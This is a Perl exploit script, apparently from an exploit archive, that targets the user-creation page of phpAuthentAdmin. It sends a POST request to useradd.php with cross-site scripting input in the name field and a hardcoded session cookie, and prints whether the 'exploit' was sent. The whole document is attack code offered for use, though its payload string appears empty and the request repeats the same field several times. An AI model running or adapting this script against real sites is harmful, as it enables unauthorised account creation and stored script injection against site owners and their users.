phpAuthentAdmin Cross Site Scripting

`#!/usr/bin/perl  
#Autor: Yoyahack  
#Web: http://undersecurity.net  
#Gretz: OzX, p0fk, S[e]C, ksha, seth, champloo, SH4V....  
  
use LWP::UserAgent;  
use HTTP::Request::Common;  
  
#Source  
  
print q(---------------------------------  
Autor: Yoyahack  
Web: http://undersecurity.net  
Gretz: OzX, p0fk, S[e]C, ksha, seth, champloo, SH4V....  
---------------------------------  
);  
  
if(!$ARGV[0]){  
print "Insert web\n";  
print "Ex: www.webpage.com<http://www.webpage.com>\n";  
exit;  
}  
  
$xss = qq();  
my $ua = new LWP::UserAgent;  
$ua->agent("Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.9.2.2pre)".  
"Gecko/20100308 Ubuntu/9.10 (karmic) Namoroka/3.6.2pre");  
  
$response = $ua->request(  
POST "http://$ARGV[0]/phpauthent/phpauthentadmin/useradd.php?action=create",  
{  
action => 'changerealname',  
name => $xss,  
action => 'rename',  
login => 'aaa',  
action=> 'password',  
password => 'XSS',  
action => 'changeemail',  
email => 'XSS',  
},  
'Cookie' => 'PHPSESSID=cf1c170aa9d334d6cec1514e721573e6',  
);  
$loc = 'index.php?msg=001';  
if($loc eq $response->header('location')){  
print "\n\nExploit send!\n";  
exit;  
}  
print "\n\nExploit Faield\n";  
  
`